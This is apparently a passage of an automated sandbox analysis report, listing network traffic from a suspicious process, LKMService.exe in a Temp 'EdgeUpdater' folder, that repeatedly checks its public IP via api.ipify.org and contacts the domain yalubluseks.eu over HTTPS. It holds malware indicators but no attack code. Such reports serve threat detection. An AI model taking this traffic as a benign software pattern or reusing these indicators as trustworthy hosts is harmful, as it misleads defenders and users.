Oct 3, 2024 03:30:21.089272022 CEST	52974	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:30:21.089303017 CEST	443	52978	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:21.089334011 CEST	52978	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:30:21.089428902 CEST	52978	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:30:21.096163988 CEST	80	52974	104.26.12.205	192.168.2.6
Oct 3, 2024 03:30:21.199723005 CEST	80	52974	104.26.12.205	192.168.2.6
Oct 3, 2024 03:30:21.200520039 CEST	52979	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:30:21.200532913 CEST	443	52979	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:21.200997114 CEST	52979	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:30:21.200997114 CEST	52979	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:30:21.201021910 CEST	443	52979	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:21.326164007 CEST	52974	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:30:21.664623976 CEST	443	52979	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:21.666445971 CEST	52979	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:30:21.666476965 CEST	443	52979	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:21.799110889 CEST	443	52979	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:21.799452066 CEST	52979	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:30:21.799463987 CEST	443	52979	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:22.284816980 CEST	443	52979	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:22.284913063 CEST	443	52979	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:22.284969091 CEST	52979	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:30:22.285293102 CEST	52979	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:30:22.285703897 CEST	52980	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:30:22.285758018 CEST	443	52980	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:22.285819054 CEST	52980	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:30:22.286120892 CEST	52980	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:30:22.286139965 CEST	443	52980	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:22.739016056 CEST	443	52980	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:22.740807056 CEST	52980	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:30:22.740842104 CEST	443	52980	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:22.864048958 CEST	443	52980	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:22.864362001 CEST	52980	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:30:22.864397049 CEST	443	52980	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:23.143086910 CEST	443	52980	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:23.143171072 CEST	443	52980	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:23.143340111 CEST	52980	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:30:23.143701077 CEST	52980	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:30:53.153734922 CEST	52974	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:30:53.168704033 CEST	80	52974	104.26.12.205	192.168.2.6
Oct 3, 2024 03:30:53.273907900 CEST	80	52974	104.26.12.205	192.168.2.6
Oct 3, 2024 03:30:53.274662018 CEST	52981	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:30:53.274746895 CEST	443	52981	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:53.274883986 CEST	52981	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:30:53.275260925 CEST	52981	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:30:53.275302887 CEST	443	52981	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:53.325186968 CEST	52974	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:30:53.742993116 CEST	443	52981	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:53.745119095 CEST	52981	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:30:53.745138884 CEST	443	52981	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:53.864661932 CEST	443	52981	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:53.918947935 CEST	52981	443	192.168.2.6	104.21.54.163

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 3, 2024 03:26:13.099467993 CEST	51149	53	192.168.2.6	1.1.1.1
Oct 3, 2024 03:26:13.106211901 CEST	53	51149	1.1.1.1	192.168.2.6
Oct 3, 2024 03:26:13.625304937 CEST	63445	53	192.168.2.6	1.1.1.1
Oct 3, 2024 03:26:13.658992052 CEST	53	63445	1.1.1.1	192.168.2.6
Oct 3, 2024 03:26:55.708014011 CEST	53	61094	162.159.36.2	192.168.2.6
Oct 3, 2024 03:26:56.209670067 CEST	53	63370	1.1.1.1	192.168.2.6
Oct 3, 2024 03:27:20.029453993 CEST	50649	53	192.168.2.6	1.1.1.1
Oct 3, 2024 03:27:20.068134069 CEST	53	50649	1.1.1.1	192.168.2.6
Oct 3, 2024 03:27:56.030666113 CEST	64627	53	192.168.2.6	1.1.1.1
Oct 3, 2024 03:27:56.037426949 CEST	53	64627	1.1.1.1	192.168.2.6
Oct 3, 2024 03:29:21.546463966 CEST	54204	53	192.168.2.6	1.1.1.1
Oct 3, 2024 03:29:21.553247929 CEST	53	54204	1.1.1.1	192.168.2.6
Oct 3, 2024 03:29:57.045437098 CEST	60899	53	192.168.2.6	1.1.1.1
Oct 3, 2024 03:29:57.052650928 CEST	53	60899	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 3, 2024 03:26:13.099467993 CEST	192.168.2.6	1.1.1.1	0x4c6e	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Oct 3, 2024 03:26:13.625304937 CEST	192.168.2.6	1.1.1.1	0x590b	Standard query (0)	yalubluseks.eu	A (IP address)	IN (0x0001)	false
Oct 3, 2024 03:27:20.029453993 CEST	192.168.2.6	1.1.1.1	0x8114	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Oct 3, 2024 03:27:56.030666113 CEST	192.168.2.6	1.1.1.1	0x204	Standard query (0)	57.122.6.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
Oct 3, 2024 03:29:21.546463966 CEST	192.168.2.6	1.1.1.1	0x7765	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Oct 3, 2024 03:29:57.045437098 CEST	192.168.2.6	1.1.1.1	0x616a	Standard query (0)	57.122.6.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 3, 2024 03:26:13.106211901 CEST	1.1.1.1	192.168.2.6	0x4c6e	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Oct 3, 2024 03:26:13.106211901 CEST	1.1.1.1	192.168.2.6	0x4c6e	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Oct 3, 2024 03:26:13.106211901 CEST	1.1.1.1	192.168.2.6	0x4c6e	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Oct 3, 2024 03:26:13.658992052 CEST	1.1.1.1	192.168.2.6	0x590b	No error (0)	yalubluseks.eu		104.21.54.163	A (IP address)	IN (0x0001)	false
Oct 3, 2024 03:26:13.658992052 CEST	1.1.1.1	192.168.2.6	0x590b	No error (0)	yalubluseks.eu		172.67.140.92	A (IP address)	IN (0x0001)	false
Oct 3, 2024 03:27:20.068134069 CEST	1.1.1.1	192.168.2.6	0x8114	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Oct 3, 2024 03:27:20.068134069 CEST	1.1.1.1	192.168.2.6	0x8114	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Oct 3, 2024 03:27:20.068134069 CEST	1.1.1.1	192.168.2.6	0x8114	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Oct 3, 2024 03:27:56.037426949 CEST	1.1.1.1	192.168.2.6	0x204	Name error (3)	57.122.6.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false
Oct 3, 2024 03:29:21.553247929 CEST	1.1.1.1	192.168.2.6	0x7765	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Oct 3, 2024 03:29:21.553247929 CEST	1.1.1.1	192.168.2.6	0x7765	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Oct 3, 2024 03:29:21.553247929 CEST	1.1.1.1	192.168.2.6	0x7765	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Oct 3, 2024 03:29:57.052650928 CEST	1.1.1.1	192.168.2.6	0x616a	Name error (3)	57.122.6.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false

HTTP Request Dependency Graph

yalubluseks.eu

api.ipify.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49715	172.67.74.152	80	800	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 03:26:13.177228928 CEST	63	OUT	GET / HTTP/1.1 Host: api.ipify.org Connection: Keep-Alive
Oct 3, 2024 03:26:13.622821093 CEST	227	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:26:13 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8cc9248eccf61851-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33
Oct 3, 2024 03:26:14.953176022 CEST	39	OUT	GET / HTTP/1.1 Host: api.ipify.org
Oct 3, 2024 03:26:15.060959101 CEST	227	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:26:15 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8cc92497cb2c1851-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33
Oct 3, 2024 03:26:46.951035023 CEST	39	OUT	GET / HTTP/1.1 Host: api.ipify.org
Oct 3, 2024 03:26:47.076143980 CEST	227	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:26:47 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8cc9255fc9bf1851-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33
Oct 3, 2024 03:26:48.118313074 CEST	39	OUT	GET / HTTP/1.1 Host: api.ipify.org
Oct 3, 2024 03:26:48.225191116 CEST	227	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:26:48 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8cc925671e321851-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	52918	104.26.12.205	80	800	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 03:27:20.077756882 CEST	39	OUT	GET / HTTP/1.1 Host: api.ipify.org
Oct 3, 2024 03:27:20.607021093 CEST	227	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:27:20 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8cc926314dcc42c4-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33
Oct 3, 2024 03:27:21.905555010 CEST	39	OUT	GET / HTTP/1.1 Host: api.ipify.org
Oct 3, 2024 03:27:22.023324966 CEST	227	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:27:21 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8cc9263a5adf42c4-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	52923	104.26.12.205	80	800	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 03:27:54.260922909 CEST	39	OUT	GET / HTTP/1.1 Host: api.ipify.org
Oct 3, 2024 03:27:54.723021984 CEST	227	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:27:54 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8cc92706b80e41ad-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	52925	104.26.12.205	80	800	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 03:27:55.733268976 CEST	39	OUT	GET / HTTP/1.1 Host: api.ipify.org

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	52926	104.26.12.205	80	800	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 03:28:01.478065968 CEST	39	OUT	GET / HTTP/1.1 Host: api.ipify.org
Oct 3, 2024 03:28:01.942761898 CEST	227	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:28:01 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8cc92733c9357cf0-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	52928	104.26.12.205	80	800	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 03:28:02.887124062 CEST	39	OUT	GET / HTTP/1.1 Host: api.ipify.org
Oct 3, 2024 03:28:03.366909981 CEST	227	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:28:03 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8cc9273c9bba1784-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	52932	104.26.12.205	80	800	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 03:28:24.469759941 CEST	39	OUT	GET / HTTP/1.1 Host: api.ipify.org
Oct 3, 2024 03:28:24.945278883 CEST	227	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:28:24 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8cc927c398fac420-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	52934	104.26.12.205	80	800	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 03:28:25.983685970 CEST	39	OUT	GET / HTTP/1.1 Host: api.ipify.org
Oct 3, 2024 03:28:26.439889908 CEST	227	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:28:26 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8cc927ccecbc7ca6-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	52937	104.26.12.205	80	800	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 03:28:28.540184975 CEST	39	OUT	GET / HTTP/1.1 Host: api.ipify.org
Oct 3, 2024 03:28:29.004704952 CEST	227	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:28:28 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8cc927dcf8cd42af-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	52939	104.26.12.205	80	800	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 03:28:29.955442905 CEST	39	OUT	GET / HTTP/1.1 Host: api.ipify.org
Oct 3, 2024 03:28:30.578412056 CEST	227	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:28:30 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8cc927e5ce1e8c15-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33
Oct 3, 2024 03:28:30.646933079 CEST	227	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:28:30 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8cc927e5ce1e8c15-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	52942	104.26.12.205	80	800	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 03:28:34.303497076 CEST	39	OUT	GET / HTTP/1.1 Host: api.ipify.org
Oct 3, 2024 03:28:34.764616013 CEST	227	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:28:34 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8cc92800ff148cb9-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	52944	104.26.12.205	80	800	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 03:28:36.885751009 CEST	39	OUT	GET / HTTP/1.1 Host: api.ipify.org
Oct 3, 2024 03:28:37.350682020 CEST	227	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:28:37 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8cc928111d55c44f-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	52948	104.26.12.205	80	800	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 03:28:42.036510944 CEST	39	OUT	GET / HTTP/1.1 Host: api.ipify.org
Oct 3, 2024 03:28:42.510267973 CEST	227	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:28:42 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8cc9283148924289-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	52950	104.26.12.205	80	800	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 03:28:43.450025082 CEST	39	OUT	GET / HTTP/1.1 Host: api.ipify.org
Oct 3, 2024 03:28:43.895359039 CEST	227	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:28:43 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8cc9283a0baa8c51-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	52953	104.26.12.205	80	800	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 03:28:47.849694967 CEST	39	OUT	GET / HTTP/1.1 Host: api.ipify.org
Oct 3, 2024 03:28:48.327817917 CEST	227	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:28:48 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8cc92855ad8043a7-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	52955	104.26.12.205	80	800	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 03:28:49.268539906 CEST	39	OUT	GET / HTTP/1.1 Host: api.ipify.org
Oct 3, 2024 03:28:49.733843088 CEST	227	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:28:49 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8cc9285e8c2c727a-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.6	52958	104.26.12.205	80	800	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 03:29:21.559252977 CEST	39	OUT	GET / HTTP/1.1 Host: api.ipify.org
Oct 3, 2024 03:29:22.024835110 CEST	227	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:29:21 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8cc92928587b5e68-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.6	52960	104.26.12.205	80	800	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 03:29:23.032233953 CEST	39	OUT	GET / HTTP/1.1 Host: api.ipify.org
Oct 3, 2024 03:29:23.514765978 CEST	227	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:29:23 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8cc9293199fe43f9-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port
18	192.168.2.6	52964	104.26.12.205	80

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 03:29:55.327461004 CEST	39	OUT	GET / HTTP/1.1 Host: api.ipify.org
Oct 3, 2024 03:29:55.790553093 CEST	227	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:29:55 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8cc929fb5c0a42c8-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port
19	192.168.2.6	52966	104.26.12.205	80

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 03:29:56.777282000 CEST	39	OUT	GET / HTTP/1.1 Host: api.ipify.org

Session ID	Source IP	Source Port	Destination IP	Destination Port
20	192.168.2.6	52967	104.26.12.205	80

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 03:29:58.208437920 CEST	39	OUT	GET / HTTP/1.1 Host: api.ipify.org
Oct 3, 2024 03:29:58.682671070 CEST	227	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:29:58 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8cc92a0d6a2043d4-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port
21	192.168.2.6	52969	104.26.12.205	80

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 03:29:59.687283039 CEST	39	OUT	GET / HTTP/1.1 Host: api.ipify.org
Oct 3, 2024 03:30:00.179977894 CEST	227	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:30:00 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8cc92a16bdab5e6c-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port
22	192.168.2.6	52972	104.26.12.205	80

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 03:30:08.349116087 CEST	39	OUT	GET / HTTP/1.1 Host: api.ipify.org
Oct 3, 2024 03:30:09.501427889 CEST	227	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:30:08 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8cc92a4cc8a6b9c5-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33
Oct 3, 2024 03:30:09.501519918 CEST	227	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:30:08 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8cc92a4cc8a6b9c5-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33
Oct 3, 2024 03:30:09.501576900 CEST	227	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:30:08 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8cc92a4cc8a6b9c5-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port
23	192.168.2.6	52974	104.26.12.205	80

Timestamp	Bytes transferred	Direction	Data
Oct 3, 2024 03:30:10.553853989 CEST	39	OUT	GET / HTTP/1.1 Host: api.ipify.org
Oct 3, 2024 03:30:11.029313087 CEST	227	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:30:10 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8cc92a5a9ff30f80-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33
Oct 3, 2024 03:30:19.985565901 CEST	39	OUT	GET / HTTP/1.1 Host: api.ipify.org
Oct 3, 2024 03:30:20.111726046 CEST	227	IN	HTTP/1.1 200 OK Date: Thu, 03 Oct 2024 01:30:20 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8cc92a934de50f80-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33
Oct 3, 2024 03:30:21.089272022 CEST	39	OUT	GET / HTTP/1.1 Host: api.ipify.org
